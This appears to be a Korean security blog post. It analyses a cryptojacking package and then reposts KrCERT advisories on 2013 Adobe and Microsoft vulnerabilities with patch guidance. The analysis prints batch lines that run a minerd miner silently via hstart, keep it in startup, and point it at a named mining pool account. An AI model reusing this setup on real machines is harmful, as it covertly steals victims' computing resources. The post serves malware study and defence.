꿈 꾸는 사람

온라인 화폐 종류

1. Bitcoin

2. Litecoin

3. Peercoin

4. Namecoin

등 위 URL에 등록되어 있는 List만 53개

해당 전자 화폐의 경우 

ltc3.exe

4개의 dll

2개의 bat

2개의 exe 파일로 구성

hstart.exe : 윈도우 창을 띄우지 않고 백그라운드로 실행 시켜주는 유틸리티

             서비스 실행 모드를 제공하지 않는 어플리케이션의 경우 

cmd 창에서 명령어를 쳐서 실행한다.

계속 켜둘 경우 사용자에게 거슬리거나 악성 행위를 하는 프로그램이면

노출되기 때문에 백그라운드로 실행 시킬 수 있도록 한다.

ssl.bat 

 - hstart /NOCONSOLE "2.bat" 내용이 적혀 있따.

   2.bat 파일을 백그라운드로 실행 시킬 수 있도록 유도 한다.

   이 bat 파일은 시작 프로그램에 등록되어 시스템 재시작시에도 채굴될 수 있도록 유도

2.bat 

 - 내용 : minerd.exe --url stratum+tcp://mine.pool-x.eu:9000 --threads=3 --userpass=anna1113.3:1234567

   minerd.exe 채굴 프로그램을 이용해서 stratum+tcp://mine.pool-x.eu:9000 pool로 쓰레드 3개를 생성하여 

   id가 anna1113.3, pwd가 1234567 을 가진 계정에 보내게 된다. 

프로세스 모니터를 통해 확인해보면, minerd.exe의 cpu 사용률이 100%에 육박한 것을 확인할 수 있다.

minerd.exe가 실행 시에 위에 이야기했듯이 아래와 같은 인자 값을 설정 후에 실행을 하게 된다.

 --url stratum+tcp://mine.pool-x.eu:9000 --threads=3 --userpass=anna1113.3:1234567

https://livechains.net/www/miner-help

Poolers minerd CPU Miner

 - minerd는 아마도 CPU miner 중에 최고일 것이고, 매일 매시간 컴퓨터에 아주 쉽게 구동해줄 수 있는 CPU miner 이다.

   minerd.exe --url stratum+tcp://somepool.somewebsite.com --userpass Username.Workername:Password

   형식으로 구동 시킬 수 있다. 당신이 사용하고 있는 계정 정보와 명확한 Pool 정보를 설정 해야 한다.

  minerd.exe에 의해 사용되는 옵션은 아래와 같다.

  C:\Documents and Settings\Administrator\바탕 화면\ltc3>minerd.exe --help

Usage: minerd [OPTIONS]

Options:

 -a, --algo=ALGO       specify the algorithm to use

 scrypt    scrypt(1024, 1, 1) (default)

 sha256d   SHA-256d

 -o, --url=URL         URL of mining server (default: http://127.0.0.1:9332/)

 -O, --userpass=U:P    username:password pair for mining server

 -u, --user=USERNAME   username for mining server

 -p, --pass=PASSWORD   password for mining server

 --cert=FILE       certificate for mining server using SSL

 -x, --proxy=[PROTOCOL://]HOST[:PORT]  connect through a proxy

 -t, --threads=N       number of miner threads (default: number of processors)

 -r, --retries=N       number of times to retry if a network call fails

 (default: retry indefinitely)

 -R, --retry-pause=N   time to pause between retries, in seconds (default: 30)

 -T, --timeout=N       network timeout, in seconds (default: 270)

 -s, --scantime=N      upper bound on time spent scanning current work when

 long polling is unavailable, in seconds (default: 5)

 --no-longpoll     disable X-Long-Polling support

 --no-stratum      disable X-Stratum support

 -q, --quiet           disable per-thread hashmeter output

 -D, --debug           enable debug output

 -P, --protocol-dump   verbose dump of protocol-level activities

 --benchmark       run in offline benchmark mode

 -c, --config=FILE     load a JSON-format configuration file

 -V, --version         display version information and exit

 -h, --help            display this help text and exit

결국 해당 악성코드는 

stratum+tcp://mine.pool-x.eu:9000 url (마이닝 풀) 로

감염 PC의 cpu를 이용하여 코인을 채굴하고 있음

HKEY_LOCAL_MACHINE\SYSTEM\Control Set 은 드라이버 설정, 하드웨어 프로필 설정등을 모아 놓은 곳으로

윈도우는 하드웨어 내용이 변경될 때 새로운 Control Set을 만들어서 만약을 대비

순서대로 ControlSet001, ControlSet002와 같이 번호가 부여된다.

출처 : http://krcert.or.kr/kor/data/secNoticeView.jsp?p_bulletin_writing_sequence=20185

개요

• Adobe社는 Adobe Flash Player 및 Shockwave Player에 영향을 주는 취약점을 해결한 보안 업데이트를 발표[1][2]
  낮은 버전 사용자는 악성코드 감염에 취약할 수 있으므로 해결방안에 따라 최신버전으로 업데이트 권고

설명

• Adobe Flash Player에서 발생하는 2개의 취약점을 해결하는 보안 업데이트를 발표[1]
  - 임의코드 실행으로 이어질 수 있는 타입 컨퓨전(Type Confusion) 취약점(CVE-2013-5331)
  - 임의코드 실행으로 이어질 수 있는 메모리 손상 취약점(CVE-2013-5332)
• Adobe Shockwave Player에서 발생하는 2개의 취약점을 해결하는 보안 업데이트를 발표[2]
  - 임의코드 실행으로 이어질 수 있는 메모리 손상 취약점(CVE-2013-5333, CVE-2013-5334)

해당 시스템

• 영향을 받는 소프트웨어
  - Adobe Flash Player(윈도우즈 및 맥) 11.9.900.152 및 이전버전
  - Adobe Flash Player(리눅스) 11.2.202.327 및 이전버전
  - Adobe AIR(윈도우즈 및 맥) 3.9.0.1210 및 이전버전
  - Adobe AIR(안드로이드) 3.9.0.1210 및 이전버전
  - Adobe AIR SDK 3.9.0.1210 및 이전버전
  - Adobe AIR SDK&Compiler 3.9.0.1210 및 이전버전
  - Adobe Shockwave Player(윈도우즈 및 맥) 12.0.6.147 및 이전버전

해결 방안

• 윈도우, 맥, 리눅스 환경의 Adobe Flash Player 사용자
  - Adobe Flash Player Download Center(http://get.adobe.com/kr/flashplayer/)에 방문하여 최신 버전을 설치하거나, 자동 업데이트를 이용하여 업그레이드
• 윈도우, 맥 환경의 Adobe AIR 사용자
  - Adobe AIR Download Center(http://get.adobe.com/kr/air/)에 방문하여 Adobe AIR 최신 버전을 설치하거나, 자동 업데이트를 이용하여 업그레이드
• 안드로이드 환경의 Adobe AIR 사용자
  - Adobe AIR가 설치된 안드로이드 폰에서 ‘구글 플레이 스토어’ 접속 → 메뉴 선택 → 내 애플리케이션 선택 →
    Adobe AIR 안드로이드 최신 버전으로 업데이트 하거나 자동업데이트를 허용하여 업그레이드
• Adobe AIR SDK 사용자
  - http://www.adobe.com/devnet/air/air-sdk-download.html 에 방문하여 Adobe AIR SDK 최신 버전을 설치
• 윈도우, 맥 환경의 Adobe Shockwave Player 사용자
  - Adobe Download Center(http://get.adobe.com/shockwave/)에 방문하여 최신 버전을 설치하거나 자동 업데이트를 이용하여 업그레이드

기타 문의사항

• 한국인터넷진흥원 인터넷침해대응센터: 국번없이 118

[참고사이트]
[1] http://helpx.adobe.com/security/products/flash-player/apsb13-28.html
[2] http://helpx.adobe.com/security/products/shockwave/apsb13-29.html

출처 : http://krcert.or.kr/kor/data/secNoticeView.jsp?p_bulletin_writing_sequence=20184

[MS13-096] Graphics Component 의 취약점으로 인한 원격코드 실행 문제

영향

설명

• 사용자가 특수하게 제작된 TIFF 파일이 포함된 컨텐츠를 열람할 경우, 원격코드가 실행될 수 있는 취약점이 존재
• 관련취약점 : Graphics Component 메모리 손상 취약점 – (CVE-2013-3906)
• 영향 : 원격코드 실행
• 중요도 : 긴급

해당시스템

• 참조사이트 참고
  - 한글 : http://technet.microsoft.com/ko-kr/security/bulletin/MS13-096
  - 영문 : http://technet.microsoft.com/en-us/security/bulletin/MS13-096

해결책

• 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용

[MS13-097] Internet Explorer 누적 보안업데이트 문제

영향

• 공격자가 영향 받는 시스템의 사용자와 동일한 권한을 획득

설명

• 사용자가 인터넷익스플로러 브라우저를 사용하여 특수하게 제작된 웹페이지를 열람할 경우, 원격코드가 실행될 수 있는 취약점이 존재
• 관련취약점
  - Internet Explorer 권한상승 취약점 – (CVE-2013-5045, CVE-2013-5046)
  - Internet Explorer 메모리 손상 취약점 – (CVE-2013-5047, CVE-2013-5048, CVE-2013-5049, CVE-2013-5051, CVE-2013-5052)
• 영향 : 원격코드 실행
• 중요도 : 긴급

해당시스템

• 참조사이트 참고
  - 한글 : http://technet.microsoft.com/ko-kr/security/bulletin/MS13-097
  - 영문 : http://technet.microsoft.com/en-us/security/bulletin/MS13-097

해결책

• 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용

[MS13-098] Windows 의 취약점으로 인한 원격코드 실행 문제

영향

• 공격자가 영향 받는 시스템에 대해 완전한 권한 획득

설명

• 사용자 또는 프로그램이 특수하게 제작·서명된 PE 파일을 실행하거나 설치할 경우, 원격코드가 실행될 수 있는 취약점이 존재
• 관련취약점 : WinVerifyTrust 서명 검증 취약점 – (CVE-2013-3900)
• 영향 : 원격코드 실행
• 중요도 : 긴급

해당시스템

• 참조사이트 참고
  - 한글 : http://technet.microsoft.com/ko-kr/security/bulletin/MS13-098
  - 영문 : http://technet.microsoft.com/en-us/security/bulletin/MS13-098

해결책

• 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용

[MS13-099] Scripting Runtime Object Library의 취약점으로 인한 원격코드 실행 문제

영향

• 공격자가 영향 받는 시스템에 대해 완전한 권한 획득

설명

• 사용자가 특수하게 제작된 웹사이트 또는 컨텐츠를 제공하는 웹사이트를 방문할 경우, 원격코드가 실행될 수 있는 취약점이 존재
• 관련취약점 : Scripting Runtime Object Library의 Use-After-Free 취약점 – (CVE-2013-5056)
• 영향 : 원격코드 실행
• 중요도 : 긴급

해당시스템

• 참조사이트 참고
  - 한글 : http://technet.microsoft.com/ko-kr/security/bulletin/MS13-099
  - 영문 : http://technet.microsoft.com/en-us/security/bulletin/MS13-099

해결책

• 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용

[MS13-100] SharePoint Server의 취약점으로 인한 원격코드 실행 문제

영향

• 공격자가 W3WP 서비스계정의 권한으로 임의코드 실행

설명

• 인증된 공격자가 특수하게 제작된 페이지 컨텐츠를 SharePoint Server로 전송할 경우, 원격코드가 실행될 수 있는 취약점이 존재
• 관련취약점 : SharePoint Server 컨텐츠 취약점 – (CVE-2013-5059)
• 영향 : 원격코드 실행
• 중요도 : 중요

해당시스템

• 참조사이트 참고
  - 한글 : http://technet.microsoft.com/ko-kr/security/bulletin/MS13-100
  - 영문 : http://technet.microsoft.com/en-us/security/bulletin/MS13-100

해결책

• 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용

[MS13-101] Kernel-Mode Driver의 취약점으로 인한 권한상승 문제

영향

• 공격자가 영향 받는 시스템에 대한 권한을 상승

설명

• 공격자가 시스템에 로그인하여 특수하게 제작된 프로그램을 실행할 경우, 권한이 상승되는 취약점이 존재
• 관련취약점
  - Win32k Integer 오버플로우 취약점 – (CVE-2013-3899)
  - Win32k Use-After-Free 취약점 – (CVE-2013-3902)
  - TrueType 폰트 파싱 취약점 - (CVE-2013-3903)
  - Port-Class 드라이버 Double Fetch 취약점 – (CVE-2013-3907)
  - Win32k Integer 오버플로우 취약점 – (CVE-2013-5058)
• 영향 : 권한상승
• 중요도 : 중요

해당시스템

• 참조사이트 참고
  - 한글 : http://technet.microsoft.com/ko-kr/security/bulletin/MS13-101
  - 영문 : http://technet.microsoft.com/en-us/security/bulletin/MS13-101

해결책

• 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용

[MS13-102] LRPC 클라이언트의 취약점으로 인한 권한상승 문제

영향

• 공격자가 영향 받는 시스템에 대한 권한을 상승

설명

• 공격자가 특수하게 제작된 LPC 포트 메시지를 LPC 클라이언트 또는 서버에 전송할 경우, 권한이 상승되는 취약점이 존재
• 관련취약점 : LRPC 클라이언트 버퍼 오버런 취약점(CVE-2013-3878)
• 영향 : 권한상승
• 중요도 : 중요

해당시스템

• 참조사이트 참고
  - 한글 : http://technet.microsoft.com/ko-kr/security/bulletin/MS13-102
  - 영문 : http://technet.microsoft.com/en-us/security/bulletin/MS13-102

해결책

• 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용

[MS13-103] ASP.NET SignalR의 취약점으로 인한 권한상승 문제

영향

• 공격자가 영향 받는 시스템에 대한 권한을 상승

설명

• 공격자가 특수하게 제작한 자바스크립트가 사용자의 브라우저에서 실행될 경우, 권한이 상승되는 취약점이 존재
• 관련취약점 : SignalR XSS 취약점 – (CVE-2013-5042)
• 영향 : 권한상승
• 중요도 : 중요

해당시스템

• 참조사이트 참고
  - 한글 : http://technet.microsoft.com/ko-kr/security/bulletin/MS13-103
  - 영문 : http://technet.microsoft.com/en-us/security/bulletin/MS13-103

해결책

• 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용

[MS13-104] Microsoft Office의 취약점으로 인한 권한상승 문제

영향

• 공격자가 영향 받는 시스템에 대한 정보를 유출

설명

• 사용자가 악성 웹사이트에서 제공하는 Office 파일을 열람할 경우, 정보가 유출되는 취약점이 존재
• 관련취약점 : Token Hijacking 취약점 – (CVE-2013-5054)
• 영향 : 정보유출
• 중요도 : 중요

해당시스템

• 참조사이트 참고
  - 한글 : http://technet.microsoft.com/ko-kr/security/bulletin/MS13-104
  - 영문 : http://technet.microsoft.com/en-us/security/bulletin/MS13-104

해결책

• 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용

[MS13-105] Exchange Server의 취약점으로 인한 원격코드 실행 문제

영향

• 공격자가 영향 받는 시스템에 대해 완전한 권한 획득

설명

• 공격자가 특수하게 제작한 파일을 이메일 첨부를 통해 취약점에 영향을 받는 Exchange Server 사용자에게 전송할 경우, 원격코드가 실행될 수 있는 취약점이 존재
• 관련취약점
  - Oracle 취약점 – (CVE-2013-5763, CVE-2013-5791)
  - MAC Disabled 취약점 – (CVE-2013-1330)
  - OWA XSS 취약점 – (CVE-2013-5072)
• 영향 : 원격코드 실행
• 중요도 : 긴급

해당시스템

• 참조사이트 참고
  - 한글 : http://technet.microsoft.com/ko-kr/security/bulletin/MS13-105
  - 영문 : http://technet.microsoft.com/en-us/security/bulletin/MS13-105

해결책

• 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용

[MS13-106] Office Shared Component 취약점으로 인한 보안기능 우회 문제

영향

• 공격자가 영향 받는 시스템의 보안기능을 우회

설명

• 공격자는 특수하게 제작한 웹 페이지를 COM 컴포넌트 지원 브라우저 사용자에게 열람하도록 유도하여, 사용자의 보안 기능을 우회할 수 있는 취약점이 존재
• 관련취약점 : HXDS ASLR 취약점 – (CVE-2013-5057)
• 영향 : 보안기능 우회
• 중요도 : 중요

해당시스템

• 참조사이트 참고
  - 한글 : http://technet.microsoft.com/ko-kr/security/bulletin/MS13-106
  - 영문 : http://technet.microsoft.com/en-us/security/bulletin/MS13-106

해결책

• 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용